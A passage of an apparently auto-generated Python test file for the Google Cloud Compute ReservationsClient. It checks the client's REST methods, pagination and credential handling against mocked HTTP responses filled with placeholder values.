for return_val, response_val in zip(return_values, response):
return_val._content = response_val.encode("UTF-8")
return_val.status_code = 200
req.side_effect = return_values
metadata = ()
pager = client.aggregated_list(request={})
assert pager._metadata == metadata
assert isinstance(pager.get("a"), compute.ReservationsScopedList)
assert pager.get("h") is None
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, tuple) for i in results)
for result in results:
assert isinstance(result, tuple)
assert tuple(type(t) for t in result) == (
str,
compute.ReservationsScopedList,
)
assert pager.get("a") is None
assert isinstance(pager.get("h"), compute.ReservationsScopedList)
pages = list(client.aggregated_list(request={}).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
def test_delete_rest(
transport: str = "rest", request_type=compute.DeleteReservationRequest
):
client = ReservationsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
error=compute.Error(errors=[compute.Errors(code="code_value")]),
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
warnings=[compute.Warnings(code=compute.Warnings.Code.CLEANUP_FAILED)],
zone="zone_value",
)
# Wrap the value into a proper Response obj
json_return_value = compute.Operation.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.delete(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.error == compute.Error(errors=[compute.Errors(code="code_value")])
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.warnings == [
compute.Warnings(code=compute.Warnings.Code.CLEANUP_FAILED)
]
assert response.zone == "zone_value"
def test_delete_rest_from_dict():
test_delete_rest(request_type=dict)
def test_delete_rest_flattened():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
json_return_value = compute.Operation.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete(
project="project_value", zone="zone_value", reservation="reservation_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, http_call, http_params = req.mock_calls[0]
body = http_params.get("data")
params = http_params.get("params")
assert "project_value" in http_call[1] + str(body) + str(params)
assert "zone_value" in http_call[1] + str(body) + str(params)
assert "reservation_value" in http_call[1] + str(body) + str(params)
def test_delete_rest_flattened_error():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete(
compute.DeleteReservationRequest(),
project="project_value",
zone="zone_value",
reservation="reservation_value",
)
def test_get_rest(transport: str = "rest", request_type=compute.GetReservationRequest):
client = ReservationsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Reservation(
commitment="commitment_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
id=205,
kind="kind_value",
name="name_value",
satisfies_pzs=True,
self_link="self_link_value",
specific_reservation=compute.AllocationSpecificSKUReservation(count=553),
specific_reservation_required=True,
status=compute.Reservation.Status.CREATING,
zone="zone_value",
)
# Wrap the value into a proper Response obj
json_return_value = compute.Reservation.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.get(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Reservation)
assert response.commitment == "commitment_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.id == 205
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.satisfies_pzs is True
assert response.self_link == "self_link_value"
assert response.specific_reservation == compute.AllocationSpecificSKUReservation(
count=553
)
assert response.specific_reservation_required is True
assert response.status == compute.Reservation.Status.CREATING
assert response.zone == "zone_value"
def test_get_rest_from_dict():
test_get_rest(request_type=dict)
def test_get_rest_flattened():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Reservation()
# Wrap the value into a proper Response obj
json_return_value = compute.Reservation.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get(
project="project_value", zone="zone_value", reservation="reservation_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, http_call, http_params = req.mock_calls[0]
body = http_params.get("data")
params = http_params.get("params")
assert "project_value" in http_call[1] + str(body) + str(params)
assert "zone_value" in http_call[1] + str(body) + str(params)
assert "reservation_value" in http_call[1] + str(body) + str(params)
def test_get_rest_flattened_error():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get(
compute.GetReservationRequest(),
project="project_value",
zone="zone_value",
reservation="reservation_value",
)
def test_get_iam_policy_rest(
transport: str = "rest", request_type=compute.GetIamPolicyReservationRequest
):
client = ReservationsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Policy(
audit_configs=[
compute.AuditConfig(
audit_log_configs=[
compute.AuditLogConfig(
exempted_members=["exempted_members_value"]
)
]
)
],
bindings=[compute.Binding(binding_id="binding_id_value")],
etag="etag_value",
iam_owned=True,
rules=[compute.Rule(action=compute.Rule.Action.ALLOW)],
version=774,
)
# Wrap the value into a proper Response obj
json_return_value = compute.Policy.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.get_iam_policy(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Policy)
assert response.audit_configs == [
compute.AuditConfig(
audit_log_configs=[
compute.AuditLogConfig(exempted_members=["exempted_members_value"])
]
)
]
assert response.bindings == [compute.Binding(binding_id="binding_id_value")]
assert response.etag == "etag_value"
assert response.iam_owned is True
assert response.rules == [compute.Rule(action=compute.Rule.Action.ALLOW)]
assert response.version == 774
def test_get_iam_policy_rest_from_dict():
test_get_iam_policy_rest(request_type=dict)
def test_get_iam_policy_rest_flattened():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Policy()
# Wrap the value into a proper Response obj
json_return_value = compute.Policy.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_iam_policy(
project="project_value", zone="zone_value", resource="resource_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, http_call, http_params = req.mock_calls[0]
body = http_params.get("data")
params = http_params.get("params")
assert "project_value" in http_call[1] + str(body) + str(params)
assert "zone_value" in http_call[1] + str(body) + str(params)
assert "resource_value" in http_call[1] + str(body) + str(params)
def test_get_iam_policy_rest_flattened_error():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_iam_policy(
compute.GetIamPolicyReservationRequest(),
project="project_value",
zone="zone_value",
resource="resource_value",
)
def test_insert_rest(
transport: str = "rest", request_type=compute.InsertReservationRequest
):
client = ReservationsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
error=compute.Error(errors=[compute.Errors(code="code_value")]),
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
warnings=[compute.Warnings(code=compute.Warnings.Code.CLEANUP_FAILED)],
zone="zone_value",
)
# Wrap the value into a proper Response obj
json_return_value = compute.Operation.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.insert(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.error == compute.Error(errors=[compute.Errors(code="code_value")])
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.warnings == [
compute.Warnings(code=compute.Warnings.Code.CLEANUP_FAILED)
]
assert response.zone == "zone_value"
def test_insert_rest_from_dict():
test_insert_rest(request_type=dict)
def test_insert_rest_flattened():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
json_return_value = compute.Operation.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
reservation_resource = compute.Reservation(commitment="commitment_value")
client.insert(
project="project_value",
zone="zone_value",
reservation_resource=reservation_resource,
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, http_call, http_params = req.mock_calls[0]
body = http_params.get("data")
params = http_params.get("params")
assert "project_value" in http_call[1] + str(body) + str(params)
assert "zone_value" in http_call[1] + str(body) + str(params)
assert compute.Reservation.to_json(
reservation_resource,
including_default_value_fields=False,
use_integers_for_enums=False,
) in http_call[1] + str(body) + str(params)
def test_insert_rest_flattened_error():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.insert(
compute.InsertReservationRequest(),
project="project_value",
zone="zone_value",
reservation_resource=compute.Reservation(commitment="commitment_value"),
)
def test_list_rest(
transport: str = "rest", request_type=compute.ListReservationsRequest
):
client = ReservationsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.ReservationList(
id="id_value",
items=[compute.Reservation(commitment="commitment_value")],
kind="kind_value",
next_page_token="next_page_token_value",
self_link="self_link_value",
warning=compute.Warning(code=compute.Warning.Code.CLEANUP_FAILED),
)
# Wrap the value into a proper Response obj
json_return_value = compute.ReservationList.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.list(request)
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListPager)
assert response.id == "id_value"
assert response.items == [compute.Reservation(commitment="commitment_value")]
assert response.kind == "kind_value"
assert response.next_page_token == "next_page_token_value"
assert response.self_link == "self_link_value"
assert response.warning == compute.Warning(code=compute.Warning.Code.CLEANUP_FAILED)
def test_list_rest_from_dict():
test_list_rest(request_type=dict)
def test_list_rest_flattened():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.ReservationList()
# Wrap the value into a proper Response obj
json_return_value = compute.ReservationList.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list(
project="project_value", zone="zone_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, http_call, http_params = req.mock_calls[0]
body = http_params.get("data")
params = http_params.get("params")
assert "project_value" in http_call[1] + str(body) + str(params)
assert "zone_value" in http_call[1] + str(body) + str(params)
def test_list_rest_flattened_error():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list(
compute.ListReservationsRequest(),
project="project_value",
zone="zone_value",
)
def test_list_pager():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Set the response as a series of pages
response = (
compute.ReservationList(
items=[
compute.Reservation(),
compute.Reservation(),
compute.Reservation(),
],
next_page_token="abc",
),
compute.ReservationList(items=[], next_page_token="def",),
compute.ReservationList(
items=[compute.Reservation(),], next_page_token="ghi",
),
compute.ReservationList(
items=[compute.Reservation(), compute.Reservation(),],
),
)
# Two responses for two calls
response = response + response
# Wrap the values into proper Response objs
response = tuple(compute.ReservationList.to_json(x) for x in response)
return_values = tuple(Response() for i in response)
for return_val, response_val in zip(return_values, response):
return_val._content = response_val.encode("UTF-8")
return_val.status_code = 200
req.side_effect = return_values
metadata = ()
pager = client.list(request={})
assert pager._metadata == metadata
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, compute.Reservation) for i in results)
pages = list(client.list(request={}).pages)
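# The last mocked ReservationList leaves next_page_token unset, so it surfaces as an empty string, marking the end of pagination.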
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
def test_resize_rest(
transport: str = "rest", request_type=compute.ResizeReservationRequest
):
client = ReservationsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
error=compute.Error(errors=[compute.Errors(code="code_value")]),
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
warnings=[compute.Warnings(code=compute.Warnings.Code.CLEANUP_FAILED)],
zone="zone_value",
)
# Wrap the value into a proper Response obj
json_return_value = compute.Operation.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.resize(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.error == compute.Error(errors=[compute.Errors(code="code_value")])
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.warnings == [
compute.Warnings(code=compute.Warnings.Code.CLEANUP_FAILED)
]
assert response.zone == "zone_value"
def test_resize_rest_from_dict():
test_resize_rest(request_type=dict)
def test_resize_rest_flattened():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
json_return_value = compute.Operation.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
reservations_resize_request_resource = compute.ReservationsResizeRequest(
specific_sku_count=1920
)
client.resize(
project="project_value",
zone="zone_value",
reservation="reservation_value",
reservations_resize_request_resource=reservations_resize_request_resource,
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, http_call, http_params = req.mock_calls[0]
body = http_params.get("data")
params = http_params.get("params")
assert "project_value" in http_call[1] + str(body) + str(params)
assert "zone_value" in http_call[1] + str(body) + str(params)
assert "reservation_value" in http_call[1] + str(body) + str(params)
assert compute.ReservationsResizeRequest.to_json(
reservations_resize_request_resource,
including_default_value_fields=False,
use_integers_for_enums=False,
) in http_call[1] + str(body) + str(params)
def test_resize_rest_flattened_error():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.resize(
compute.ResizeReservationRequest(),
project="project_value",
zone="zone_value",
reservation="reservation_value",
reservations_resize_request_resource=compute.ReservationsResizeRequest(
specific_sku_count=1920
),
)
def test_set_iam_policy_rest(
transport: str = "rest", request_type=compute.SetIamPolicyReservationRequest
):
client = ReservationsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Policy(
audit_configs=[
compute.AuditConfig(
audit_log_configs=[
compute.AuditLogConfig(
exempted_members=["exempted_members_value"]
)
]
)
],
bindings=[compute.Binding(binding_id="binding_id_value")],
etag="etag_value",
iam_owned=True,
rules=[compute.Rule(action=compute.Rule.Action.ALLOW)],
version=774,
)
# Wrap the value into a proper Response obj
json_return_value = compute.Policy.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.set_iam_policy(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Policy)
assert response.audit_configs == [
compute.AuditConfig(
audit_log_configs=[
compute.AuditLogConfig(exempted_members=["exempted_members_value"])
]
)
]
assert response.bindings == [compute.Binding(binding_id="binding_id_value")]
assert response.etag == "etag_value"
assert response.iam_owned is True
assert response.rules == [compute.Rule(action=compute.Rule.Action.ALLOW)]
assert response.version == 774
def test_set_iam_policy_rest_from_dict():
test_set_iam_policy_rest(request_type=dict)
def test_set_iam_policy_rest_flattened():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Policy()
# Wrap the value into a proper Response obj
json_return_value = compute.Policy.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
zone_set_policy_request_resource = compute.ZoneSetPolicyRequest(
bindings=[compute.Binding(binding_id="binding_id_value")]
)
client.set_iam_policy(
project="project_value",
zone="zone_value",
resource="resource_value",
zone_set_policy_request_resource=zone_set_policy_request_resource,
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, http_call, http_params = req.mock_calls[0]
body = http_params.get("data")
params = http_params.get("params")
assert "project_value" in http_call[1] + str(body) + str(params)
assert "zone_value" in http_call[1] + str(body) + str(params)
assert "resource_value" in http_call[1] + str(body) + str(params)
assert compute.ZoneSetPolicyRequest.to_json(
zone_set_policy_request_resource,
including_default_value_fields=False,
use_integers_for_enums=False,
) in http_call[1] + str(body) + str(params)
def test_set_iam_policy_rest_flattened_error():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.set_iam_policy(
compute.SetIamPolicyReservationRequest(),
project="project_value",
zone="zone_value",
resource="resource_value",
zone_set_policy_request_resource=compute.ZoneSetPolicyRequest(
bindings=[compute.Binding(binding_id="binding_id_value")]
),
)
def test_test_iam_permissions_rest(
transport: str = "rest", request_type=compute.TestIamPermissionsReservationRequest
):
client = ReservationsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.TestPermissionsResponse(
permissions=["permissions_value"],
)
# Wrap the value into a proper Response obj
json_return_value = compute.TestPermissionsResponse.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.test_iam_permissions(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.TestPermissionsResponse)
assert response.permissions == ["permissions_value"]
def test_test_iam_permissions_rest_from_dict():
test_test_iam_permissions_rest(request_type=dict)
def test_test_iam_permissions_rest_flattened():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.TestPermissionsResponse()
# Wrap the value into a proper Response obj
json_return_value = compute.TestPermissionsResponse.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
test_permissions_request_resource = compute.TestPermissionsRequest(
permissions=["permissions_value"]
)
client.test_iam_permissions(
project="project_value",
zone="zone_value",
resource="resource_value",
test_permissions_request_resource=test_permissions_request_resource,
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, http_call, http_params = req.mock_calls[0]
body = http_params.get("data")
params = http_params.get("params")
assert "project_value" in http_call[1] + str(body) + str(params)
assert "zone_value" in http_call[1] + str(body) + str(params)
assert "resource_value" in http_call[1] + str(body) + str(params)
assert compute.TestPermissionsRequest.to_json(
test_permissions_request_resource,
including_default_value_fields=False,
use_integers_for_enums=False,
) in http_call[1] + str(body) + str(params)
def test_test_iam_permissions_rest_flattened_error():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.test_iam_permissions(
compute.TestIamPermissionsReservationRequest(),
project="project_value",
zone="zone_value",
resource="resource_value",
test_permissions_request_resource=compute.TestPermissionsRequest(
permissions=["permissions_value"]
),
)
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.ReservationsRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = ReservationsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# It is an error to provide a credentials file and a transport instance.
transport = transports.ReservationsRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = ReservationsClient(
client_options={"credentials_file": "credentials.json"},
transport=transport,
)
# It is an error to provide scopes and a transport instance.
transport = transports.ReservationsRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = ReservationsClient(
client_options={"scopes": ["1", "2"]}, transport=transport,
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.ReservationsRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
client = ReservationsClient(transport=transport)
assert client.transport is transport
@pytest.mark.parametrize("transport_class", [transports.ReservationsRestTransport,])
def test_transport_adc(transport_class):
# Test default credentials are used if not provided.
with mock.patch.object(google.auth, "default") as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class()
adc.assert_called_once()
def test_reservations_base_transport_error():
# Passing both a credentials object and credentials_file should raise an error
with pytest.raises(core_exceptions.DuplicateCredentialArgs):
transport = transports.ReservationsTransport(
credentials=ga_credentials.AnonymousCredentials(),
credentials_file="credentials.json",
)
def test_reservations_base_transport():
# Instantiate the base transport.
with mock.patch(
"google.cloud.compute_v1.services.reservations.transports.ReservationsTransport.__init__"
) as Transport:
Transport.return_value = None
transport = transports.ReservationsTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
"aggregated_list",
"delete",
"get",
"get_iam_policy",
"insert",
"list",
"resize",
"set_iam_policy",
"test_iam_permissions",
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
@requires_google_auth_gte_1_25_0
def test_reservations_base_transport_with_credentials_file():
# Instantiate the base transport with a credentials file
with mock.patch.object(
google.auth, "load_credentials_from_file", autospec=True
) as load_creds, mock.patch(
"google.cloud.compute_v1.services.reservations.transports.ReservationsTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.ReservationsTransport(
credentials_file="credentials.json", quota_project_id="octopus",
)
load_creds.assert_called_once_with(
"credentials.json",
scopes=None,
default_scopes=(
"https://www.googleapis.com/auth/compute",
"https://www.googleapis.com/auth/cloud-platform",
),
quota_project_id="octopus",
)
@requires_google_auth_lt_1_25_0
def test_reservations_base_transport_with_credentials_file_old_google_auth():
# Instantiate the base transport with a credentials file
with mock.patch.object(
google.auth, "load_credentials_from_file", autospec=True
) as load_creds, mock.patch(
"google.cloud.compute_v1.services.reservations.transports.ReservationsTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.ReservationsTransport(
credentials_file="credentials.json", quota_project_id="octopus",
)
load_creds.assert_called_once_with(
"credentials.json",
scopes=(
"https://www.googleapis.com/auth/compute",
"https://www.googleapis.com/auth/cloud-platform",
),
quota_project_id="octopus",
)
def test_reservations_base_transport_with_adc():
# Test the default credentials are used if credentials and credentials_file are None.
with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch(
"google.cloud.compute_v1.services.reservations.transports.ReservationsTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.ReservationsTransport()
adc.assert_called_once()
@requires_google_auth_gte_1_25_0
def test_reservations_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
ReservationsClient()
adc.assert_called_once_with(
scopes=None,
default_scopes=(
"https://www.googleapis.com/auth/compute",
"https://www.googleapis.com/auth/cloud-platform",
),
quota_project_id=None,
)
@requires_google_auth_lt_1_25_0
def test_reservations_auth_adc_old_google_auth():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
ReservationsClient()
adc.assert_called_once_with(
scopes=(
"https://www.googleapis.com/auth/compute",
"https://www.googleapis.com/auth/cloud-platform",
),
quota_project_id=None,
)
def test_reservations_http_transport_client_cert_source_for_mtls():
cred = ga_credentials.AnonymousCredentials()
with mock.patch(
"google.auth.transport.requests.AuthorizedSession.configure_mtls_channel"
) as mock_configure_mtls_channel:
